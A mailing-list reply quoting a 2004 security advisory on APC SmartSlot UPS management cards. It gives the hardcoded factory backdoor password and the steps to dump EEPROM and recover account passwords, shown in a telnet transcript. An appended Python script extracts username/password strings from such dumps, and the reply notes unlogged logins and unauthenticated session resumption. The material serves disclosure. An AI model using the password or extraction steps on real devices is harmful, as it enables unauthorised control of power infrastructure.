In-Reply-To: <1076930672.19026.88.camel@localhost.localdomain>

Just tested on a client's Symmetra RM 12000 and had some interesting results
with the following setup:

Model Number: AP9617
Manufacture Date: 12/20/2002
Hardware Revision: A10
Symmetra APP Ver: 120
Symmetra APP Date: 12/09/2002
AOS Card Ver: 120
AOS Card Date: 12/10/2002

There are a few side notes that should be noted:

The backdoor login does NOT show up in the event log for the system.

If the telnet session using the backdoor login is terminated with ^] then the
session can be resumed simply by using telnet to sign back in with NO
authentication. This even works if attempting to resume the session from a
different IP address.

>*** Background:
>APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
>supply) products have a Web and SNMP management card installed that permits
>local serial console, TELNET, web and SNMP management, monitoring and
>mains power control of attached devices.
>
>
>*** The Problem:
>APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
>be abused to extract plain text username/password details for all accounts
>and hence gain unauthorised full control of the device.
>
>Tested vulnerable:
>SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
>MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0
>
>
>*** Description:
>The "backdoor" password is designed for use by the factory for initial
>configuration of the card, e.g. MAC Address, Serial Number etc. However, it
>is possible to dump the contents of EEPROM which amongst other things
>stores the account usernames and passwords.
>
>The "backdoor" password is accepted via either the local serial port or
>TELNET. Use of the password on the web interface does not appear to be
>possible.
>
>
>*** To recreate (typical example):
>Connect a console to the serial port or TELNET to the card. At the username
>prompt use any username. The password is all alphabetic characters and is
>case sensitive: TENmanUFactOryPOWER
>
>At the selection prompt, type 13 and press return. Type the byte address of
>the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
>the username and password pairs. Different firmware revisions may have the
>account details at different EEPROM locations. The accounts in the example
>below are the default accounts after their passwords have been changed.
>Username: apc Password: BBCCDDEEF
>Username: device Password: AAAABBBBB
>
>Press return to get back to the Factory Menu and press ctrl-A to logout.
>You can now TELNET to the card again and use the account details you've
>just recovered to log into and control the device.
>
>You should use the other selections with extreme care. You may cause
>irreparable damage and will most certainly invalidate any warranty.
>The EEPROM also contains other user-configurable options in either plain
>text or binary encoded form. They are not detailed in this advisory.
>
>Example:
>
>[root@always root]# telnet 192.168.1.1
>Trying 192.168.1.1...
>Connected to 192.168.1.1.
>Escape character is '^]'.
>
>User Name : phade
>Password  : TENmanUFactOryPOWER
>
>Factory Menu
><CTRL-A> to exit
>
>1 AP9606
>2 WA0044004472
>3 G9
>4 10/25/2000
>5 00 C0 B7 A2 C8 2D
>6 v3.2.1
>7 A
>8 A
>9 192.168.1.1
>A 255.255.255.0
>B 192.168.1.254
>C
>D
>E
>F
>G
>
>Selection> 13
>
>Enter byte address in Hex(XXXX): 1d0
>
>01D0 FF 50 46 61 70 63 00 FF .PFapc..
>01D8 FF FF FF FF FF FF 42 42 ......BB
>01E0 43 43 44 44 45 45 46 00 CCDDEEF.
>01E8 FF 64 65 76 69 63 65 00 .device.
>01F0 FF FF FF FF 41 41 41 41 ....AAAA
>01F8 42 42 42 42 42 00 FF 61 BBBBB..a
>0200 64 6D 69 6E 20 75 73 65 dmin use
>0208 72 20 70 68 72 61 73 65 r phrase
>0210 00 FF FF FF FF FF FF FF ........
>0218 FF FF FF FF FF FF FF FF ........
>0220 64 65 76 69 63 65 20 75 device u
>0228 73 65 72 20 70 68 72 61 ser phra
>0230 73 65 00 FF FF FF FF FF se......
>0238 FF FF FF FF FF FF FF FF ........
>0240 FF 00 00 FF FF FF FF 21 .......!
>0248 56 00 00 00 00 00 00 55 V......U
>
><sp>nxt,b-bck,p-pch,other-exit
>
>
>*** Workaround/fix:
>Ensure that access to the local serial port is physically restricted and
>disable the TELNET interface as described in the device documentation. A
>patched version of the firmware which requires the management password
>to be entered before accessing the factory settings may be available
>from APC.
>
>
>*** Vendor status:
>APC were first notified six months ago on 12th August 2003 and were
>initially helpful in patching the problem. However, after testing a couple
>of beta fixes I've heard nothing for over 3 months.
>
>Dave Tarbatt,
>http://null.sniffing.net/
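Added example (not part of the post above, and not APC's code): a small parser for the factory-menu EEPROM dump format the advisory reproduces. It rebuilds the byte image from the address and hex columns only, ignoring the trailing ASCII column so that renderings such as "CCDDEEF." are never mistaken for data, then lists every run of printable ASCII that ends in a 0x00 byte. The sample dump is the one quoted in the advisory (AP9606, AOS v3.2.1, selection 13, address 1d0); the pairing helper assumes the layout that dump shows, username string followed by password string once per account, which the advisory warns may differ between firmware revisions.

```python
"""Parse the factory-menu EEPROM dump shown in the advisory and list the
NUL-terminated ASCII strings it contains (where the account usernames and
passwords sit on the AP9606 card).

Added example, not the original post's or APC's code.  SAMPLE_DUMP is copied
from the advisory.  credential_pairs() assumes the layout that dump shows:
username string, then password string, repeated once per account.
"""
from typing import Dict, List, Optional, Tuple

# Dump copied from the advisory.  Per line: 16-bit hex address, eight hex
# bytes, then the ASCII rendering of those same eight bytes.
SAMPLE_DUMP = """\
01D0 FF 50 46 61 70 63 00 FF .PFapc..
01D8 FF FF FF FF FF FF 42 42 ......BB
01E0 43 43 44 44 45 45 46 00 CCDDEEF.
01E8 FF 64 65 76 69 63 65 00 .device.
01F0 FF FF FF FF 41 41 41 41 ....AAAA
01F8 42 42 42 42 42 00 FF 61 BBBBB..a
0200 64 6D 69 6E 20 75 73 65 dmin use
0208 72 20 70 68 72 61 73 65 r phrase
0210 00 FF FF FF FF FF FF FF ........
0218 FF FF FF FF FF FF FF FF ........
0220 64 65 76 69 63 65 20 75 device u
0228 73 65 72 20 70 68 72 61 ser phra
0230 73 65 00 FF FF FF FF FF se......
0238 FF FF FF FF FF FF FF FF ........
0240 FF 00 00 FF FF FF FF 21 .......!
0248 56 00 00 00 00 00 00 55 V......U
"""

BYTES_PER_LINE = 8


def _is_hex(tok: str, width: int) -> bool:
    return len(tok) == width and all(c in "0123456789abcdefABCDEF" for c in tok)


def parse_dump(text: str) -> Dict[int, int]:
    """Return {address: byte} for every byte in a factory-menu hex dump.

    Only the address and the eight hex columns are used; the ASCII column is
    ignored.  Lines that do not fit the format (prompts, menu text) are skipped.
    """
    mem: Dict[int, int] = {}
    for line in text.splitlines():
        toks = line.split()
        if len(toks) < 1 + BYTES_PER_LINE or not _is_hex(toks[0], 4):
            continue
        data = toks[1:1 + BYTES_PER_LINE]
        if not all(_is_hex(t, 2) for t in data):
            continue
        base = int(toks[0], 16)
        for offset, tok in enumerate(data):
            mem[base + offset] = int(tok, 16)
    return mem


def extract_strings(mem: Dict[int, int], min_len: int = 3) -> List[Tuple[int, str]]:
    """Return (start_address, string) for each run of printable ASCII that is
    terminated by a 0x00 byte.  0xFF padding, runs shorter than min_len and
    unterminated runs (the trailing 'U' in the sample) are dropped.
    """
    found: List[Tuple[int, str]] = []
    run: List[str] = []
    start: Optional[int] = None
    prev_addr: Optional[int] = None
    for addr in sorted(mem):
        b = mem[addr]
        if prev_addr is not None and addr != prev_addr + 1:
            run, start = [], None          # gap in the dump: never join across it
        prev_addr = addr
        if 0x20 <= b < 0x7F:
            if start is None:
                start = addr
            run.append(chr(b))
            continue
        if b == 0x00 and start is not None and len(run) >= min_len:
            found.append((start, "".join(run)))
        run, start = [], None
    return found


def credential_pairs(strings: List[Tuple[int, str]], accounts: int = 2) -> List[Tuple[str, str]]:
    """Pair consecutive strings as (username, password), following the layout
    the advisory's dump shows for its two accounts.  Other firmware revisions
    may lay the region out differently, so always read the raw strings too.
    """
    values = [s for _, s in strings[: 2 * accounts]]
    return list(zip(values[0::2], values[1::2]))


if __name__ == "__main__":
    image = parse_dump(SAMPLE_DUMP)
    found = extract_strings(image)
    for addr, s in found:
        print(f"{addr:04X}  {s!r}")
    for user, pw in credential_pairs(found):
        print(f"username={user!r} password={pw!r}")
```

On the advisory's dump this yields the two password strings the advisory names, the two "phrase" strings that follow them, and "PFapc" for the first username: the dump has the bytes 50 46 ("PF") immediately before "apc" with no terminator between them, and the advisory, which identifies the username simply as "apc", does not say what those two bytes are. That is exactly why it tells you to look carefully rather than trust any fixed offset.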